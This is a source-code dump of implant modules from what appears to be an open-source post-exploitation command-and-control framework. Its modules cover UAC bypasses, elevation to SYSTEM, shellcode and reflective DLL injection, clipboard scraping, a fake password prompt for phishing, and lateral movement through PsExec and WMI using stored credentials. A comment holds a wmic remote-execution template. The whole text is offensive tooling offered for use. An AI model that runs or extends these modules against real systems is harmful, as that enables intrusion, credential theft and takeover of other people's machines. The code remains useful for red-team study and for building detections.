"data/implant/elevate/bypassuac_sdclt.js" 47 | 48 | self.dispatch(workloads, self.job) 49 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_slui.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class SLUIJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if (int(self.session.build) < 9600 or int(self.session.build) > 17133) and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | #self.shell.print_plain(self.data) 22 | 23 | class SLUIImplant(core.implant.Implant): 24 | 25 | NAME = "Bypass UAC slui" 26 | DESCRIPTION = "Bypass UAC via registry hijack for slui.exe. Drops no files to disk." 27 | AUTHORS = ["TheNaterz", "bytecode77"] 28 | STATE = "implant/elevate/bypassuac_slui" 29 | 30 | def load(self): 31 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 32 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 33 | 34 | def job(self): 35 | return SLUIJob 36 | 37 | def run(self): 38 | id = self.options.get("PAYLOAD") 39 | payload = self.load_payload(id) 40 | 41 | if payload is None: 42 | self.shell.print_error("Payload %s not found." % id) 43 | return 44 | 45 | workloads = {} 46 | workloads["js"] = "data/implant/elevate/bypassuac_slui.js" 47 | 48 | self.dispatch(workloads, self.job) 49 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_systempropertiesadvanced.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class SystemPropertiesAdvancedJob(core.job.Job): 6 | def create(self): 7 | if self.session_id == -1: 8 | return 9 | if (int(self.session.build) < 14393 or int(self.session.build) >= 18632) and self.options.get("IGNOREBUILD") == "false": 10 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 11 | return False 12 | 13 | def done(self): 14 | self.display() 15 | 16 | def display(self): 17 | self.results = "Completed" 18 | 19 | class SystemPropertiesAdvancedImplant(core.implant.Implant): 20 | 21 | NAME = "Bypass UAC SystemPropertiesAdvanced" 22 | DESCRIPTION = "UAC bypass through DLL Hijacking method (systempropertiesadvanced binary)" 23 | AUTHORS = ["@JosueEncinar"] 24 | STATE = "implant/elevate/bypassuac_systempropertiesadvanced" 25 | 26 | def load(self): 27 | self.options.register("USER", "", "Current User") 28 | self.options.register("DLL", "", "Malicius DLL. First use msfvenom and upload it to Windows. Example: C:/Users/IEUser/Desktop/srrstr.dll") 29 | 30 | def job(self): 31 | return SystemPropertiesAdvancedJob 32 | 33 | def run(self): 34 | workloads = {} 35 | workloads["js"] = "data/implant/elevate/bypassuac_systempropertiesadvanced.js" 36 | 37 | self.dispatch(workloads, self.job) 38 | -------------------------------------------------------------------------------- /modules/implant/elevate/bypassuac_wsreset.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class WsResetJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if int(self.session.build) < 17134 and self.options.get("IGNOREBUILD") == "false": 13 | self.error("0", "The target may not be vulnerable to this implant. Set IGNOREBUILD to true to run anyway.", "Target build not vuln", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | 22 | class WsResetImplant(core.implant.Implant): 23 | 24 | NAME = "Bypass UAC Wsreset" 25 | DESCRIPTION = "UAC bypass Fileless - Wsreset bypass UAC ." 26 | AUTHORS = ["@JosueEncinar"] 27 | STATE = "implant/elevate/bypassuac_wsreset" 28 | 29 | def load(self): 30 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 31 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 32 | 33 | def job(self): 34 | return WsResetJob 35 | 36 | def run(self): 37 | id = self.options.get("PAYLOAD") 38 | payload = self.load_payload(id) 39 | 40 | if payload is None: 41 | self.shell.print_error("Payload %s not found." % id) 42 | return 43 | 44 | workloads = {} 45 | workloads["js"] = "data/implant/elevate/bypassuac_wsreset.js" 46 | 47 | self.dispatch(workloads, self.job) 48 | -------------------------------------------------------------------------------- /modules/implant/elevate/system_createservice.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class CreateServiceJob(core.job.Job): 6 | def create(self): 7 | id = self.options.get("PAYLOAD") 8 | payload = self.load_payload(id) 9 | self.options.set("PAYLOAD_DATA", payload) 10 | if self.session_id == -1: 11 | return 12 | if self.session.elevated != 1 and self.options.get("IGNOREADMIN") == "false": 13 | self.error("0", "This job requires an elevated session. Set IGNOREADMIN to true to run anyway.", "Not elevated", "") 14 | return False 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.results = "Completed" 21 | 22 | class CreateServiceImplant(core.implant.Implant): 23 | 24 | NAME = "SYSTEM via SC.exe" 25 | DESCRIPTION = "Elevate from an administrative session to SYSTEM via SC.exe. Drops no files to disk." 26 | AUTHORS = ["TheNaterz", "jennamagius"] 27 | STATE = "implant/elevate/system_createservice" 28 | 29 | def load(self): 30 | self.options.register("PAYLOAD", "", "run listeners for a list of IDs") 31 | self.options.register("PAYLOAD_DATA", "", "the actual data", hidden=True) 32 | 33 | def job(self): 34 | return CreateServiceJob 35 | 36 | def run(self): 37 | id = self.options.get("PAYLOAD") 38 | payload = self.load_payload(id) 39 | 40 | if payload is None: 41 | self.shell.print_error("Payload %s not found." % id) 42 | return 43 | 44 | workloads = {} 45 | workloads["js"] = "data/implant/elevate/system_createservice.js" 46 | 47 | self.dispatch(workloads, self.job) 48 | -------------------------------------------------------------------------------- /modules/implant/fun/thunderstruck.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | import urllib.request 5 | 6 | class ThunderstruckJob(core.job.Job): 7 | def create(self): 8 | if self.session_id == -1: 9 | response = urllib.request.urlopen(self.options.get("VIDEOURL")).read().decode() 10 | ms = response.split('approxDurationMs\\":\\"')[1].split("\\")[0] 11 | seconds = int(ms)//1000 12 | self.options.set("SECONDS", str(seconds+1)) 13 | 14 | def done(self): 15 | self.display() 16 | 17 | def display(self): 18 | self.results = "Completed" 19 | self.shell.print_plain(self.data) 20 | 21 | class ThunderstruckImplant(core.implant.Implant): 22 | 23 | NAME = "Thunderstruck" 24 | DESCRIPTION = "Opens hidden IE to the Thunderstruck YouTube video" 25 | AUTHORS = ["zerosum0x0"] 26 | STATE = "implant/fun/thunderstruck" 27 | 28 | def load(self): 29 | self.options.register("VIDEOURL", "https://www.youtube.com/watch?v=v2AC41dglnM", "YouTube video to play") 30 | self.options.register("SECONDS", "", "video length", hidden=True) 31 | 32 | def run(self): 33 | self.shell.print_status("Retrieving video length...") 34 | response = urllib.request.urlopen(self.options.get("VIDEOURL")).read().decode() 35 | ms = response.split('approxDurationMs\\":\\"')[1].split("\\")[0] 36 | seconds = int(ms)//1000 37 | self.shell.print_status(f"Video length: {seconds} seconds") 38 | 39 | self.options.set("SECONDS", str(seconds+1)) 40 | 41 | payloads = {} 42 | #payloads["vbs"] = self.loader.load_script("data/implant/fun/thunderstruck.vbs", self.options) 43 | payloads["js"] = "data/implant/fun/thunderstruck.js" 44 | 45 | self.dispatch(payloads, ThunderstruckJob) 46 | -------------------------------------------------------------------------------- /modules/implant/fun/voice.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class VoiceJob(core.job.Job): 6 | def done(self): 7 | self.display() 8 | 9 | def display(self): 10 | self.results = "Completed" 11 | self.shell.print_plain(self.data) 12 | 13 | class VoiceImplant(core.implant.Implant): 14 | 15 | NAME = "Voice" 16 | DESCRIPTION = "Makes the computer speak a message." 17 | AUTHORS = ["RiskSense, Inc."] 18 | STATE = "implant/fun/voice" 19 | 20 | def load(self): 21 | self.options.register("MESSAGE", "I can't do that Dave", "message to speak") 22 | 23 | def job(self): 24 | return VoiceJob 25 | 26 | def run(self): 27 | payloads = {} 28 | #payloads["vbs"] = self.load_script("data/implant/fun/voice.vbs", self.options) 29 | payloads["js"] = "data/implant/fun/voice.js" 30 | 31 | self.dispatch(payloads, self.job) 32 | -------------------------------------------------------------------------------- /modules/implant/gather/clipboard.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class ClipboardJob(core.job.Job): 6 | def done(self): 7 | self.display() 8 | 9 | def display(self): 10 | self.shell.print_plain("Clipboard contents:") 11 | self.shell.print_plain(self.data) 12 | self.results = self.data 13 | 14 | class ClipboardImplant(core.implant.Implant): 15 | 16 | NAME = "Scrape Clipboard" 17 | DESCRIPTION = "Gets the contents of the clipboard" 18 | AUTHORS = ["RiskSense, Inc."] 19 | STATE = "implant/gather/clipboard" 20 | 21 | def load(self): 22 | pass 23 | 24 | def job(self): 25 | return ClipboardJob 26 | 27 | def run(self): 28 | payloads = {} 29 | payloads["js"] = "data/implant/gather/clipboard.js" 30 | self.dispatch(payloads, self.job) 31 | -------------------------------------------------------------------------------- /modules/implant/gather/enum_printers.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class EnumPrintersJob(core.job.Job): 4 | def done(self): 5 | self.display() 6 | 7 | def display(self): 8 | self.shell.print_plain("Printer Connections:") 9 | self.shell.print_plain(self.data) 10 | self.results = self.data 11 | 12 | class EnumPrintersImplant(core.implant.Implant): 13 | 14 | NAME = "Enumerate Printer Connections" 15 | DESCRIPTION = "Enumerates all Printer Connections" 16 | AUTHORS = ["Tony M Lambert @ForensicITGuy"] 17 | STATE = "implant/gather/enum_printers" 18 | 19 | def load(self): 20 | pass 21 | 22 | def job(self): 23 | return EnumPrintersJob 24 | 25 | def run(self): 26 | payloads = {} 27 | payloads["js"] = "data/implant/gather/enum_printers.js" 28 | self.dispatch(payloads, self.job) 29 | 30 | 31 | -------------------------------------------------------------------------------- /modules/implant/gather/enum_shares.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class ExecCmdImplant(core.implant.Implant): 4 | pass 5 | -------------------------------------------------------------------------------- /modules/implant/gather/enum_users.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class EnumUsersJob(core.job.Job): 4 | 5 | def create(self): 6 | self.users = [] 7 | 8 | def report(self, handler, data, sanitize = False): 9 | user = data.decode() 10 | handler.reply(200) 11 | 12 | if user == "Complete": 13 | super(EnumUsersJob, self).report(handler, data, False) 14 | 15 | if user.lower() not in [u.lower() for u in self.users]: 16 | self.users.append(user) 17 | 18 | def done(self): 19 | 20 | if self.shell.domain_info: 21 | all_domain_admins = [da for das in [[k[0].lower()+"\\"+da.lower(), k[1].lower()+"\\"+da.lower()] for k in self.shell.domain_info for da in self.shell.domain_info[k]["Domain Admins"]] for da in das] 22 | self.users = [user+"*" if user.lower() in all_domain_admins else user for user in self.users] 23 | 24 | header = "Logged in users on "+self.ip 25 | self.results = "\n\n"+header+"\n"+"="*len(header)+"\n" 26 | self.results += "\n".join(self.users) 27 | self.results += "\n" 28 | 29 | self.display() 30 | 31 | def display(self): 32 | self.print_good(self.results) 33 | 34 | 35 | class EnumUsersImplant(core.implant.Implant): 36 | 37 | NAME = "Enum Users" 38 | DESCRIPTION = "Enumerates user sessions on the target system." 39 | AUTHORS = ["zerosum0x0", "TheNaterz"] 40 | STATE = "implant/gather/enum_users" 41 | 42 | def load(self): 43 | pass 44 | 45 | def job(self): 46 | return EnumUsersJob 47 | 48 | def run(self): 49 | payloads = {} 50 | payloads["js"] = "data/implant/gather/enum_users.js" 51 | 52 | self.dispatch(payloads, self.job) 53 | -------------------------------------------------------------------------------- /modules/implant/gather/office_key.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class ExecCmdImplant(core.implant.Implant): 4 | pass 5 | -------------------------------------------------------------------------------- /modules/implant/gather/windows_key.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class ExecCmdImplant(core.implant.Implant): 4 | pass 5 | -------------------------------------------------------------------------------- /modules/implant/inject/reflectdll_excel.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class ExcelReflectJob(core.job.Job): 4 | def done(self): 5 | self.results = "Completed" 6 | self.display() 7 | 8 | def display(self): 9 | pass 10 | #self.shell.print_plain(str(self.errno)) 11 | 12 | class ExcelReflectImplant(core.implant.Implant): 13 | 14 | NAME = "Reflective DLL via Excel" 15 | DESCRIPTION = "Executes an arbitrary reflective DLL." 16 | AUTHORS = ["RiskSense, Inc."] 17 | STATE = "implant/inject/reflectdll_excel" 18 | 19 | def load(self): 20 | self.options.register("DLLPATH", "", "the DLL to inject", required=True) 21 | 22 | def job(self): 23 | return ExcelReflectJob 24 | 25 | def run(self): 26 | workloads = {} 27 | #workloads["vbs"] = self.load_script("data/implant/manage/enable_rdesktop.vbs", self.options) 28 | workloads["js"] = "data/implant/inject/reflectdll_excel.js" 29 | 30 | self.dispatch(workloads, self.job) 31 | -------------------------------------------------------------------------------- /modules/implant/inject/shellcode_dotnet2js.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | import core.job 3 | import base64 4 | import os.path 5 | import binascii 6 | 7 | class SDotNet2JSJob(core.job.Job): 8 | def create(self): 9 | self.errstat = 0 10 | self.options.set("SC_B64", self.scb64(self.options.get("SC_HEX"))) 11 | 12 | def scb64(self, path): 13 | if os.path.isfile(path): 14 | with open(path, 'r') as fileobj: 15 | text = base64.b64encode(binascii.unhexlify(fileobj.read())).decode() 16 | else: 17 | text = base64.b64encode(binascii.unhexlify(path)).decode() 18 | 19 | index = 0 20 | ret = '"'; 21 | for c in text: 22 | ret += str(c) 23 | index += 1 24 | if index % 100 == 0: 25 | ret += '"+\r\n"' 26 | 27 | ret += '"' 28 | return ret 29 | 30 | def report(self, handler, data, sanitize = False): 31 | data = data.decode('latin-1') 32 | 33 | if len(data) == 0: 34 | handler.reply(200) 35 | return 36 | 37 | if data == "Complete" and self.errstat != 1: 38 | super(SDotNet2JSJob, self).report(handler, data) 39 | 40 | #self.print_good(data) 41 | 42 | handler.reply(200) 43 | 44 | def done(self): 45 | self.results = "Complete" 46 | self.display() 47 | 48 | def display(self): 49 | try: 50 | self.print_good(self.data) 51 | except: 52 | pass 53 | #self.shell.print_plain(str(self.errno)) 54 | 55 | class SDotNet2JSImplant(core.implant.Implant): 56 | 57 | NAME = "Shellcode via DotNet2JS" 58 | DESCRIPTION = "Executes arbitrary shellcode using the DotNet2JS technique. Inject shellcode into a host process via createremotethread as a new thread." 59 | AUTHORS = ["zerosum0x0", "TheNaterz", "tiraniddo", "psmitty"] 60 | STATE = "implant/inject/shellcode_dotnet2js" 61 | 62 | def load(self): 63 | self.options.register("DLLCOMMANDS", "", "string to pass to dll if needed", required=False) 64 | self.options.register("SC_HEX", "", "relative path to shellcode/dll hex or paste hex string", required=True) 65 | self.options.register("SC_B64", "", "shellcode in base64", advanced=True) 66 | self.options.register("DLLOFFSET", "0", "Offset to the reflective loader", advanced=True) 67 | self.options.register("PID", "0", "process ID to inject into (0 = current process)", required=True) 68 | 69 | def job(self): 70 | return SDotNet2JSJob 71 | 72 | def run(self): 73 | workloads = {} 74 | workloads["js"] = "data/implant/inject/shellcode_dotnet2js.js" 75 | 76 | self.dispatch(workloads, self.job) 77 | -------------------------------------------------------------------------------- /modules/implant/inject/shellcode_excel.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | import core.job 3 | import string 4 | 5 | class ExcelShellcodeJob(core.job.Job): 6 | def done(self): 7 | self.results = "Completed" 8 | self.display() 9 | 10 | def display(self): 11 | pass 12 | #self.shell.print_plain(str(self.errno)) 13 | 14 | class ExcelShellcodeImplant(core.implant.Implant): 15 | 16 | NAME = "Shellcode via Excel" 17 | DESCRIPTION = "Executes arbitrary shellcode using Excel COM objects" 18 | AUTHORS = ["zerosum0x0"] 19 | STATE = "implant/inject/shellcode_excel" 20 | 21 | def load(self): 22 | self.options.register("SHELLCODE", "90c3", "in ASCII hex format (e.g.: 31c0c3)", required=True) 23 | self.options.register("SHELLCODEDECCSV", "", "decimal CSV shellcode", hidden=True) 24 | self.options.register("VBACODE", "", ".vba source", hidden=True) 25 | 26 | # todo: we need to createprocess/remotethread instead of createthread 27 | # but heres a quick fix that will let us migrate 28 | self.options.register("SLEEP", "30000", "how long to wait for shellcode to run") 29 | 30 | def job(self): 31 | return ExcelShellcodeJob 32 | 33 | def run(self): 34 | shellcode = self.options.get("SHELLCODE") 35 | 36 | if not self.validate_shellcode(shellcode): 37 | self.shell.print_error("SHELLCODE option is an invalid hex string.") 38 | return 39 | 40 | self.options.set("SHELLCODEDECCSV", self.convert_shellcode(shellcode)) 41 | 42 | vba = self.loader.load_script("data/implant/inject/shellcode.vba", self.options) 43 | vba = vba.decode().replace("\n", "\\n") 44 | 45 | self.options.set("VBACODE", vba) 46 | 47 | workloads = {} 48 | workloads["js"] = self.loader.load_script("data/implant/inject/shellcode_excel.js", self.options) 49 | 50 | self.dispatch(workloads, self.job) 51 | -------------------------------------------------------------------------------- /modules/implant/manage/enable_rdesktop.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class EnableRDesktopJob(core.job.Job): 6 | def create(self): 7 | mode = "0" if self.options.get("ENABLE") == "true" else "1" 8 | self.options.set("MODE", mode) 9 | def done(self): 10 | self.results = "Completed" 11 | self.display() 12 | 13 | def display(self): 14 | pass 15 | #self.shell.print_plain(str(self.errno)) 16 | 17 | class EnableRDesktopImplant(core.implant.Implant): 18 | 19 | NAME = "Enable Remote Desktop" 20 | DESCRIPTION = "Enables RDP on the target system." 21 | AUTHORS = ["RiskSense, Inc."] 22 | STATE = "implant/manage/enable_rdesktop" 23 | 24 | def load(self): 25 | self.options.register("ENABLE", "true", "toggle to enable or disable", enum=["true", "false"]) 26 | self.options.register("MODE", "", "the value for this script", hidden=True) 27 | 28 | def job(self): 29 | return EnableRDesktopJob 30 | 31 | def run(self): 32 | workloads = {} 33 | #workloads["vbs"] = self.load_script("data/implant/manage/enable_rdesktop.vbs", self.options) 34 | workloads["js"] = "data/implant/manage/enable_rdesktop.js" 35 | 36 | self.dispatch(workloads, self.job) 37 | -------------------------------------------------------------------------------- /modules/implant/manage/exec_cmd.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class ExecCmdJob(core.job.Job): 6 | def create(self): 7 | self.options.set("FCMD", self.options.get('CMD').replace("\\", "\\\\").replace('"', '\\"')) 8 | self.options.set("FDIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"')) 9 | 10 | def report(self, handler, data, sanitize = False): 11 | self.results = self.decode_downloaded_data(data, handler.get_header("encoder", 1252), True).decode("cp"+handler.get_header("shellchcp", '437')) 12 | handler.reply(200) 13 | self.completed = 4 14 | self.done() 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.shell.print_plain("Result for `%s`:" % self.options.get('CMD').replace('\\"', '"').replace("\\\\", "\\")) 21 | self.shell.print_plain(self.results) 22 | 23 | class ExecCmdImplant(core.implant.Implant): 24 | 25 | NAME = "Execute Command" 26 | DESCRIPTION = "Executes a command on the target system." 27 | AUTHORS = ["RiskSense, Inc."] 28 | STATE = "implant/manage/exec_cmd" 29 | 30 | def load(self): 31 | self.options.register("CMD", "hostname", "command to run") 32 | self.options.register("OUTPUT", "true", "retrieve output?", enum=["true", "false"]) 33 | self.options.register("DIRECTORY", "%TEMP%", "writeable directory for output", required=False) 34 | self.options.register("FCMD", "", "cmd after escaping", hidden=True) 35 | self.options.register("FDIRECTORY", "", "dir after escaping", hidden=True) 36 | # self.options.register("FILE", "", "random uuid for file name", hidden=True) 37 | 38 | def job(self): 39 | return ExecCmdJob 40 | 41 | def run(self): 42 | stuff = self.options.get("CMD").lower() 43 | if "powershell" in stuff and self.shell.confirm_prompt("Really run PowerShell? HET! y/N:") != "y": 44 | return 45 | 46 | payloads = {} 47 | #payloads["vbs"] = self.load_script("data/implant/manage/exec_cmd.vbs", self.options) 48 | payloads["js"] = "data/implant/manage/exec_cmd.js" 49 | 50 | self.dispatch(payloads, self.job) 51 | -------------------------------------------------------------------------------- /modules/implant/manage/killav.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class ExecCmdImplant(core.implant.Implant): 4 | pass 5 | -------------------------------------------------------------------------------- /modules/implant/phish/password_box.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class PasswordBoxJob(core.job.Job): 6 | def done(self): 7 | self.results = self.data 8 | self.display() 9 | 10 | def display(self): 11 | self.shell.print_plain("Input contents:") 12 | self.shell.print_plain(self.data) 13 | 14 | class PasswordBoxImplant(core.implant.Implant): 15 | 16 | NAME = "Password Box" 17 | DESCRIPTION = "Try to phish a user" 18 | AUTHORS = ["zerosum0x0"] 19 | STATE = "implant/phish/password_box" 20 | 21 | def load(self): 22 | self.options.register("Message", "You must enter your password to continue...", "Displayed to user") 23 | 24 | def job(self): 25 | return PasswordBoxJob 26 | 27 | def run(self): 28 | payloads = {} 29 | payloads["js"] = "data/implant/phish/password_box.js" 30 | self.dispatch(payloads, self.job) 31 | -------------------------------------------------------------------------------- /modules/implant/pivot/exec_psexec.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | import os.path 5 | 6 | 7 | class PsExecLiveJob(core.job.Job): 8 | def create(self): 9 | cred_id = self.options.get("CREDID") 10 | if cred_id: 11 | key = self.shell.creds_keys[int(cred_id)] 12 | smbuser = self.shell.creds[key]["Username"] 13 | smbpass = self.shell.creds[key]["Password"] 14 | smbdomain = self.shell.creds[key]["Domain"] 15 | self.options.set("SMBUSER", smbuser) 16 | if not smbuser: 17 | self.shell.print_warning("Cred has no Username!") 18 | self.options.set("SMBPASS", smbpass) 19 | if not smbpass: 20 | self.shell.print_warning("Cred has no Password!") 21 | self.options.set("SMBDOMAIN", smbdomain) 22 | if not smbdomain: 23 | self.shell.print_warning("Cred has no Domain!") 24 | self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"')) 25 | 26 | def done(self): 27 | self.results = "Completed" 28 | self.display() 29 | 30 | def display(self): 31 | pass 32 | #self.shell.print_plain("Result for `%s`:" % self.options.get('CMD')) 33 | #self.shell.print_plain(self.data) 34 | 35 | class PsExecLiveImplant(core.implant.Implant): 36 | 37 | NAME = "PsExec_Live" 38 | DESCRIPTION = "Executes a command on another system, utilizing live.sysinternals.com publicly hosted tools." 39 | AUTHORS = ["RiskSense, Inc."] 40 | STATE = "implant/pivot/exec_psexec" 41 | 42 | def load(self): 43 | self.options.register("CMD", "hostname", "command to run") 44 | self.options.register("RHOST", "", "name/IP of the remote") 45 | self.options.register("SMBUSER", "", "username for login") 46 | self.options.register("SMBPASS", "", "password for login") 47 | self.options.register("SMBDOMAIN", ".", "domain for login") 48 | self.options.register("CREDID", "", "cred id from creds") 49 | #self.options.register("PAYLOAD", "", "payload to stage") 50 | self.options.register("RPATH", "\\\\\\\\live.sysinternals.com@SSL\\\\tools\\\\", "path to psexec.exe") 51 | self.options.register("DIRECTORY", "%TEMP%", "writeable directory for output", required=False) 52 | # self.options.register("FILE", "", "random uuid for file name", hidden=True) 53 | 54 | def job(self): 55 | return PsExecLiveJob 56 | 57 | def run(self): 58 | payloads = {} 59 | payloads["js"] = "data/implant/pivot/exec_psexec.js" 60 | self.dispatch(payloads, self.job) 61 | -------------------------------------------------------------------------------- /modules/implant/pivot/exec_wmi.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | 4 | class SWbemServicesJob(core.job.Job): 5 | def done(self): 6 | self.results = "PID Start Code: %s" % self.data 7 | self.display() 8 | 9 | def display(self): 10 | self.shell.print_plain("PID Start Code: %s" % self.data) 11 | 12 | class SWbemServicesImplant(core.implant.Implant): 13 | 14 | NAME = "WMI SWbemServices" 15 | DESCRIPTION = "Executes a command on another system." 16 | AUTHORS = ["zerosum0x0"] 17 | STATE = "implant/pivot/exec_wmi" 18 | 19 | def load(self): 20 | self.options.register("CMD", "hostname", "command to run") 21 | self.options.register("RHOST", "", "name/IP of the remote") 22 | self.options.register("SMBUSER", "", "username for login") 23 | self.options.register("SMBPASS", "", "password for login") 24 | self.options.register("SMBDOMAIN", ".", "domain for login") 25 | self.options.register("CREDID", "", "cred id from creds") 26 | 27 | def job(self): 28 | return SWbemServicesJob 29 | 30 | def run(self): 31 | cred_id = self.options.get("CREDID") 32 | if cred_id: 33 | key = self.shell.creds_keys[int(cred_id)] 34 | smbuser = self.shell.creds[key]["Username"] 35 | smbpass = self.shell.creds[key]["Password"] 36 | smbdomain = self.shell.creds[key]["Domain"] 37 | self.options.set("SMBUSER", smbuser) 38 | if not smbuser: 39 | self.shell.print_warning("Cred has no Username!") 40 | self.options.set("SMBPASS", smbpass) 41 | if not smbpass: 42 | self.shell.print_warning("Cred has no Password!") 43 | self.options.set("SMBDOMAIN", smbdomain) 44 | if not smbdomain: 45 | self.shell.print_warning("Cred has no Domain!") 46 | 47 | payloads = {} 48 | payloads["js"] = "data/implant/pivot/exec_wmi.js" 49 | 50 | self.dispatch(payloads, self.job) 51 | -------------------------------------------------------------------------------- /modules/implant/pivot/exec_wmic.py: -------------------------------------------------------------------------------- 1 | # wmic /node:~IP~ /user:~SMBDOMAIN~\~SMBUSER~ /password:~SMBPASS~ process call create "cmd /c ~CMD~" 2 | import core.implant 3 | 4 | class ExecCmdImplant(core.implant.Implant): 5 | pass 6 | -------------------------------------------------------------------------------- /modules/implant/pivot/stage_wmi.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | 4 | # todo: inherit the exec_wmi module's jobs and implant instead of copypasta 5 | 6 | class SWbemServicesJob(core.job.Job): 7 | def done(self): 8 | self.results = "PID Start Code: %s" % self.data 9 | self.display() 10 | 11 | def display(self): 12 | self.shell.print_plain("PID Start Code: %s" % self.data) 13 | 14 | class SWbemServicesImplant(core.implant.Implant): 15 | 16 | NAME = "WMI SWbemServices" 17 | DESCRIPTION = "Stages another system." 18 | AUTHORS = ["zerosum0x0"] 19 | STATE = "implant/pivot/stage_wmi" 20 | 21 | def load(self): 22 | self.options.register("CMD", "hostname", "command to run", hidden=True) 23 | self.options.register("RHOST", "", "name/IP of the remote") 24 | self.options.register("SMBUSER", "", "username for login") 25 | self.options.register("SMBPASS", "", "password for login") 26 | self.options.register("SMBDOMAIN", ".", "domain for login") 27 | self.options.register("CREDID", "", "cred id from creds") 28 | self.options.register("PAYLOAD", "", "payload to stage") 29 | 30 | def job(self): 31 | return SWbemServicesJob 32 | 33 | def run(self): 34 | id = self.options.get("PAYLOAD") 35 | payload = self.load_payload(id) 36 | 37 | if payload is None: 38 | self.shell.print_error("Payload %s not found." % id) 39 | return 40 | 41 | self.options.set("CMD", payload) 42 | 43 | cred_id = self.options.get("CREDID") 44 | 45 | if cred_id: 46 | key = self.shell.creds_keys[int(cred_id)] 47 | smbuser = self.shell.creds[key]["Username"] 48 | smbpass = self.shell.creds[key]["Password"] 49 | smbdomain = self.shell.creds[key]["Domain"] 50 | self.options.set("SMBUSER", smbuser) 51 | if not smbuser: 52 | self.shell.print_warning("Cred has no Username!") 53 | self.options.set("SMBPASS", smbpass) 54 | if not smbpass: 55 | self.shell.print_warning("Cred has no Password!") 56 | self.options.set("SMBDOMAIN", smbdomain) 57 | if not smbdomain: 58 | self.shell.print_warning("Cred has no Domain!") 59 | 60 | payloads = {} 61 | payloads["js"] = "data/implant/pivot/exec_wmi.js" 62 | 63 | self.dispatch(payloads, self.job) 64 | -------------------------------------------------------------------------------- /modules/implant/util/multi_module.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | import time 3 | import string 4 | 5 | class MultiModuleImplant(core.implant.Implant): 6 | 7 | NAME = "Multi Module Execution" 8 | DESCRIPTION = "Run multiple modules in succession" 9 | AUTHORS = ["TheNaterz"] 10 | STATE = "implant/util/multi_module" 11 | 12 | def load(self): 13 | self.options.register("MODULES", "", "Modules to run in succession (comma seperated)", required = True) 14 | self.options.register("DELAY", "0", "Number of seconds between each job", required = True) 15 | 16 | def run(self): 17 | for module in self.options.get("MODULES").split(","): 18 | plugin = self.shell.plugins[module.strip()] 19 | old_zombie = plugin.options.get("ZOMBIE") 20 | plugin.options.set("ZOMBIE", self.options.get("ZOMBIE")) 21 | plugin.run() 22 | plugin.options.set("ZOMBIE", old_zombie) 23 | 24 | delay = int(self.options.get("DELAY")) 25 | if delay > 0: 26 | time.sleep(delay) 27 | 28 | -------------------------------------------------------------------------------- /modules/implant/util/upload_file.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class UploadFileJob(core.job.Job): 6 | def create(self): 7 | last = self.options.get("LFILE").split("/")[-1] 8 | self.options.set("FILE", last) 9 | self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"')) 10 | 11 | def report(self, handler, data): 12 | if handler.get_header('X-UploadFileJob', False): 13 | with open(self.options.get("LFILE"), "rb") as f: 14 | fdata = f.read() 15 | 16 | headers = {} 17 | headers['Content-Type'] = 'application/octet-stream' 18 | headers['Content-Length'] = len(fdata) 19 | handler.reply(200, fdata, headers) 20 | return 21 | 22 | 